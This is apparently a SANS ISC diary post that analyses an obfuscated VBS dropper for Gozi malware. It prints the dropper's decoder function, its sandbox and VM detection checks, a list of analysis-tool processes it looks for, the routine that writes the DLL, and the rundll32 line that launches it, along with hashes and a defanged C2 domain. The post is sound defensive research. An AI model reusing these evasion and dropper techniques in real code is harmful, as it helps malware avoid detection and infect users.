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Reverse-Engineering Malware: Advanced Code AnalysisOnline | Greenwich Mean TimeOct 28th - Nov 1st 2024

Russian Dolls VBS Obfuscation

Published: 2021-06-04. Last Updated: 2021-06-04 05:01:36 UTC
by Xavier Mertens (Version: 1)
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We received an interesting sample from one of our readers (thanks Henry!) and we like this. If you find something interesting, we are always looking for fresh meat! Henry's sample was delivered in a password-protected ZIP archive and the file was a VBS script called "presentation_37142.vbs" (SHA256:2def8f350b1e7fc9a45669bc5f2c6e0679e901aac233eac63550268034942d9f). I uploaded a copy of the file on MalwareBazaar[1].

When you open it, you spot immediately the first obfuscation technique used: characters encoding but also a lot of junk comments (to make readability more difficult). So, first, let's get rid of the comments (there are present in both formats: "REM" or a single quote)

root@remnux:/MalwareZoo/20210603# egrep -v "^(REM|')" presentation_37142.vbs >presentation_37142.vbs.nocomments

When you have a look at the cleaned file, you see some calls to execute the result of a function limpet():

Indeed, below in the code, we find the function:

Function limpet(hmx)
  KONQLa = lbound(hmx)
  OOSUF = ubound(hmx)
  for judicious = KONQL to OOSUF
    if hmx(judicious) = 999999 Then
      Talmud = Talmud & ChrW(Int((chivalrous-pbI+1)*Rnd+pbI))
      Talmud = Talmud & ChrW(hmx(judicious) - (((5965 - (12 - 6.0)) - 292.0) - 5660.0))
    End if
  limpet = Talmud
End Function

It's used to decode arrays of integers that we find in the file. We can try to replace all the execute()calls with Wscript.Echo() and execute the file:

We decoded more pieces of the script but we see that it fails on the line "ELvv". We can see a bunch of strings at the end of the script:


Those functions are created when the strings are deobfuscated by limpet() and executed. Here is an example:

Function ELvv()
  GewqX("DEBUG: FS_FCH - Start")
  on error resume next
  Dim chivalrous,pbI
  WScript.Sleep Int((chivalrous-pbI+1)*Rnd+pbI)
  Set setupService = GetObject("winmgmts:\\.\root\cimv2")
  Set judiciouslItems = setupService.ExecQuery("Select * from Win32_LogicalDisk")
  For Each inhwg In judiciouslItems
    Ppli = Ppli + Int(inhwg.Size / (39 + ((22 + (-17.0)) + (1073741782 - 2.0))))
  If round(Ppli) < (((7 + 27.0) + (-19.0)) + (6208 - 6173.0)) Then
    GewqX("DEBUG: FS_FCH - False")
  End If
  GewqX("DEBUG: FS_FCH - True")
End Function

Do you remember all the arrays of interegers in the original script? Not all of them were followed by an execute(). Because they are used in another array in a deobfuscated function:

Function PRJh()
  GewqX("DEBUG: F_DROPPED - Start")
  Dim osteopathic:Set osteopathic = CreateObject("ADO"+"DB.S"+"tr"+"eam")
  With osteopathic
    .Type = 2
    .Charset = "ISO-8859-1"
    For Each codeposit in Array(rUM, dPO, XRbN, yrs, niTC, zVpd, FwV, FCp, bQec, SRtOv, bASM, Nys, GuUuW, WeK, wpzJ, YHKZ, JnPu, oAS, oaC, zlwL, pKkq, NXmo, QTrX, Flut, nAkRy, HRQyY, zzTHn, Csg, omBk, xJrCx, IsEW, XYJUj, NeJ, PxnF, DXx, QvkW, DnNcg, RnDr, vHgx, Ynwg, wfG, aOaUo, HiKrS, xQB, bLErk, COtj, ATRrc, sxLK, Dyj, sDZ, BmUn, jLX, FgF, uhE, dBtN, gaVt, xBJ, PuiTq, btwV, avhtp, hNd, IZh, vJMC, Sqi, saJ, svVXu, qJI, SXft, KIpu, izb, yYY, MtIz, KdoAK, ALd, QJwqG, xisN, sexYP, irJ, NCI, SBma, AQpP, FOz, nVmL, RRB, JIBYA, WfhqI, aQQN, udc, Xvle, OFMs, awj, udzh, OwA, hkgk, SxR, thlD, UXOkn, LKR, TfsoC, wSCJ, cVANb, uZO, BAOxQ, uPPY, BfW, hle, rsdR, QoZkT, Tua, aFr, GCLj, HJy, EGFrK, ppp, ArQcy, LaK, ByYn, ZyPzH, onTV, gARY, HCXTl, ZVt, nKEv, PtaK, eti, hrKE, eXwev, ddDZ, xyN, zCGr, BpvU, lmO, QMl, iZA, bvLfp, GWOG, qWtY, oin, fUDXE, bMSg, uGYU, SMa, GSS, TURRX, vvGy, EiM, BzYH, opQ, OOH, mpKJ, HPnoY, TtJsn, Jdx, DaTI, gdf, xHl, mjF, YnD, KWsA, UrvS, RUkY, szER, tIGWz, UuOZ, kCg, BPiH, ZJS, Met, KVkoD, tdLQ, opJ, CxK, hDX, OqOhw, GJPId, QkuF, jEm, bMjTD, Wfm, qnv, iwX, bPdD, nbva, CcdOc, iEvqT, PTwoC, AjDE, NURs, CXQc, hkGY, QENnM, gIpa, bVf, nNh, CBrt, jiJE, Szoen, qRa, UmwG, dmPCT, xBTPw, mJzrP, hWgcR, kOgs, DINkp, blA, lalRK, UgQmB, gQgs, ZGLuf, GpTw, NKSF, GEya, Szw, sut, mee, MGuCv, pAhj, mhgP, lWqmb, pAD, Eiyd, dCn, DbcQR, rhscz, ARgF, wFpS, MGv, Aqtuc, gfqu, LqY, Iph, MxzQ, QUT, CLzUD, ShzgE, SCr, gSu, BgGX, fEyv, nzHHg, JAtaq, EtUo, tOR, BLo, nlKy, QIKP, QTPI, JorR, Mqo, Qyut, Ekfe, MhvQF, ZtRzU, LjOgB, VyK, Bluo, POGf, nmMl, OwLN, KHn, dbsnZ, qMMuW, DInM, MlbSL, HbS, SVr, Harw, Srd, cLL, EDW754, UajxU, uFp, vCgaf, OFg, JsVin, NIuAD, OVz, veT, EzdVL, DFZgp, WfrR, NCP, sZb, xaCQ, OvD, iXS, OLez, YaIjt, hLDNJ, DMhMf, oRpL, zaY, Cfu, jwt, wRux, WFR, xmAW, Jng, TxJ, YSB, tRDsh, lerhk, cHFw, TqDMb, VEt763, zvJ, zsz, qbO, tvqtX, JFWO, Yvz, lFsX, OtLxd, KiBDP, bfK, Hvp, Kjih, WUCEg, HdTbW, WZPn, lJiok, pAuh, MBqS, grwz, aPsWo, QGdkF, Zig, BvB, AeSnp, pnZl, LEsr, yFS, eJkhN, ozCs, sPP, DpyGu, dJv, ram, fzpK, XAfht, nXB, EoaJ, dhZeR, xwuE, uyB, afK, LVQk, Niqn, FxJFC, wfUhd, kdBo, eqj, CiF, DDMRO, OTj, xnZ842, ADSM, aEQ, hqB, lrBWH, RnGp, xSeG, EOZI, QmScs, VPcRZ, lZOaQ, kCQM, RKE, dMO, LKGwR, RkVx, bPxAv, mmnQO, wSoiq, Mzm, ZEYEP, yqcY, QwCor, XWazl, kYRx, toCiV, nhELZ, kcSLs, oTBxY, DgxmU, ibw, mpkq, aaTTR, LnjuS, wOH, AZL, MdUpB, WzA, yQbeO, cTz, HhpIT, hUDb, TJr, SYw, mTQ, Ncm, Qackb, DBOpx, zUt, jDFf, NQH, EPu, qDh, rWwx, ecbWb, nmVbz, BCH, JfEdB, upm, Aek, SXLUH, kim, XjXMj, OEcx, nJpLa, bqVTd, Tsg, MOA, dBci, YUM, eFa, wQN, TXDP, uHmt, rxW, EcOhJ, KcK, ZetI, RXEK, Imq, LFfk, aWTf, dJklK, DCY, DzPVT, WkK, lmeb, VXy, hmaUa, XsV, tlPuy, KCWj, weqD, gEd574, cRWmH, uyxS, HCm, XtMnx, lijm, uAT, gexWJ, ZQs, VvCEp, pgvCk, LsJh, ySkqT, Kzwtv, gTcM, bhLVG, bMtx, oBA, pCpHo, JhwuT, tmCJ, FlnBx, CWGT, Rzj, wQPJ, JLxr, ueiX, rdbX, DuxK, cszZ, Rbg, UeK, uYU, LeIZq, hBUp, vKTFA, MIY, zCD, XtGy, OLU, Umr, WBWsH, SIjEe, wblv, IXnk, ruRbR, aNW, nJdCW, XexJB, GbZ, Coz, gdp, qtjKq, iUFUB, NlaC, rLNFl, pleE, bma, iyDD, ElvJ, AkGP, Kmv, VQI, dgbHA, bAA, AgU, YTABm, gXjXx, DYm, dXuBM, tFLpx, BqiQ, FgOOF, dHJ, zTKGi, xitWR, htZix, pvn, MVI, gsN, Mpa, Czx, FZf, kyX, uNzIl, zhcBS, yOFY, fPn, qPPJ)
      .WriteText limpet(codeposit)
    .Position = 0
    .SaveToFile sandhill + "racial.drc", 2
  End With
  GewqX("DEBUG: F_DROPPED - True")
End Function

That's why I called it the "Russian Dolls" technique because we have arrays of data used by arrays of data etc... 

Let's execute the function PRJh() and dump the file on the disk: racial.drc[2] (SHA256:77E706F98B1E4FE48A4A1631B27529DC587AEAB2D187322439D3B5A726DA2F80). It's a DLL with only one export: DllRegisterServer.

But first, let's check the other functions in the VBS script:

  • ELvv checks the available disk space
  • QSV checks the numbers of CPU (cores)
  • Zme checks the available memory
  • numb checks for interesting running processes
  • TdJb checks the uptime
  • RGOD check files in %TEMP%
  • baronial creates a file called "adobe.url" in %TEMP% which points to (?)

We have here classic sandbox/virtualization detection techniques.

Here is the list of processed searched by numb:

Brenner = Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.exe","qqffo.exe","timeout.exe","commview.exe","iris.exe","qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","regshot.exe","vx.exe","dumpcap.exe","lordpe.exe","RepMgr64.exe","winalysis.exe","emul.exe","malmon.exe","RepUtils32.exe","winapioverride32.exe","ethereal.exe","mbarun.exe","RepUx.exe","windbg.exe","ettercap.exe","mdpmon.exe","runsample.exe","windump.exe","fakehttpserver.exe","mmr.exe","samp1e.exe","winspy.exe","fakeserver.exe","mmr.exe","sample.exe","wireshark.exe","Fiddler.exe","multipot.exe","sandboxiecrypto.exe","XXX.exe","filemon.exe","netsniffer.exe","sandboxiedcomlaunch.exe")

The function ERa runs the dumped DLL:

avlt = "rundll32" + " " + sandhill + "racial.drc" + ",DllRegisterServer":setupService.create avlt

This DLL is part of the Gozi[3] malware family and communicates with a C2 server located at authd[.]feronok[.]com.

To conclude, the VBS script has some debugging code implemented via a specific function:

GewqX("DEBUG: F_MESSAGE - Start")

The function is simple:

Function GewqX(victrola)
  If (InStr(WScript.ScriptName, cStr(82984)) > 0 And ucMHV = 0) Then
  End If
End Function

The debugging is enabled if the script filename contains the substring "82984".


Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant

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Reverse-Engineering Malware: Advanced Code AnalysisOnline | Greenwich Mean TimeOct 28th - Nov 1st 2024


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